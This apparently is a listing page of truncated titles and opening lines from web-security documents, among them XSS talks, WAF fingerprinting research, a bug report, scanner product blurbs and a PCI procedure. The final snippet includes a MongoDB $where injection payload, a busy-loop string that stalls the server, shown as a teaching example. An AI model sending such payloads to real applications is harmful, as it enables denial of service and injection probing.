More informationFINAL DoIT 11.03.2015 - v.4 PAYMENT CARD INDUSTRY DATA SECURITY STANDARDS APPLICATION DEVELOPMENT AND MAINTENANCE PROCEDURES
Purpose: The Department of Information Technology (DoIT) is committed to developing secure applications. DoIT s System Development Methodology (SDM) and Application Development requirements ensure that
More informationCross Site Scripting (XSS) and PHP Security. Anthony Ferrara NYPHP and OWASP Security Series June 30, 2011
Cross Site Scripting (XSS) and PHP Security Anthony Ferrara NYPHP and OWASP Security Series June 30, 2011 What Is Cross Site Scripting? Injecting Scripts Into Otherwise Benign and Trusted Browser Rendered
More informationThe Image that called me
The Image that called me Active Content Injection with SVG Files A presentation by Mario Heiderich, 2011 Introduction Mario Heiderich Researcher and PhD student at the Ruhr- University, Bochum Security
More informationWAFFle: Fingerprinting Filter Rules of Web Application Firewalls
Email: sebastian.schinzel@cs.fau.de Twitter: @seecurity WAFFle: Fingerprinting Filter Rules of Web Application Firewalls Isabell Schmitt, Sebastian Schinzel* Friedrich-Alexander Universität Erlangen-Nürnberg
More informationBug Report. Date: March 19, 2011 Reporter: Chris Jarabek (cjjarabe@ucalgary.ca)
Bug Report Date: March 19, 2011 Reporter: Chris Jarabek (cjjarabe@ucalgary.ca) Software: Kimai Version: 0.9.1.1205 Website: http://www.kimai.org Description: Kimai is a web based time-tracking application.
More informationAdvanced XSS. Nicolas Golubovic
Advanced XSS Nicolas Golubovic Image courtesy of chanpipat / FreeDigitalPhotos.net Today's menu 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course:
More informationWeb application security
Web application security Sebastian Lopienski CERN Computer Security Team openlab and summer lectures 2010 (non-web question) Is this OK? int set_non_root_uid(int uid) { // making sure that uid is not 0
More informationWeb Application Firewalls: What the vendors do NOT want you to know. The OWASP Foundation http://www.owasp.org
Web Application Firewalls: What the vendors do NOT want you to know Sandro Gauci EnableSecurity sandro@enablesecurity.com nd Wendel G. Henrique Trustwave whenrique@trustwave.com Copyright The OWASP Foundation
More informationAnybody who has a Web presence understands that
Article ISSA Title Article The Author Global Voice of Information Security Evaluating the safety of your Web presence Web Application Testing By Brad C. Johnson There is inherent risk on the Internet the
More informationMatriXay WEB Application Vulnerability Scanner V 5.0. 1. Overview. (DAS- WEBScan ) - - - - - The best WEB application assessment tool
MatriXay DAS-WEBScan MatriXay WEB Application Vulnerability Scanner V 5.0 (DAS- WEBScan ) - - - - - The best WEB application assessment tool 1. Overview MatriXay DAS- Webscan is a specific application
More informationWeb Application Security
E-SPIN PROFESSIONAL BOOK Vulnerability Management Web Application Security ALL THE PRACTICAL KNOW HOW AND HOW TO RELATED TO THE SUBJECT MATTERS. COMBATING THE WEB VULNERABILITY THREAT Editor s Summary
More informationProject 2: Web Security Pitfalls
EECS 388 September 19, 2014 Intro to Computer Security Project 2: Web Security Pitfalls Project 2: Web Security Pitfalls This project is due on Thursday, October 9 at 6 p.m. and counts for 8% of your course
More informationExternal Network & Web Application Assessment. For The XXX Group LLC October 2012
External Network & Web Application Assessment For The XXX Group LLC October 2012 This report is solely for the use of client personal. No part of it may be circulated, quoted, or reproduced for distribution
More informationWeb Application Firewalls Evaluation and Analysis. University of Amsterdam System & Network Engineering MSc
Web Application Firewalls Evaluation and Analysis Andreas Karakannas Andreas.Karakanas@os3.nl George Thessalonikefs George.Thessalonikefs@os3.nl University of Amsterdam System & Network Engineering MSc
More informationAcunetix Website Audit. 5 November, 2014. Developer Report. Generated by Acunetix WVS Reporter (v8.0 Build 20120808)
Acunetix Website Audit 5 November, 2014 Developer Report Generated by Acunetix WVS Reporter (v8.0 Build 20120808) Scan of http://filesbi.go.id:80/ Scan details Scan information Starttime 05/11/2014 14:44:06
More informationNuclear Regulatory Commission Computer Security Office Computer Security Standard
Nuclear Regulatory Commission Computer Security Office Computer Security Standard Office Instruction: Office Instruction Title: CSO-STD-1108 Web Application Standard Revision Number: 1.0 Effective Date:
More informationWhat about MongoDB? can req.body.input 0; var date = new Date(); do {curdate = new Date();} while(curdate-date<10000)
Security What about MongoDB? Even though MongoDB doesn t use SQL, it can be vulnerable to injection attacks db.collection.find( {active: true, $where: function() { return obj.credits - obj.debits < req.body.input;
More information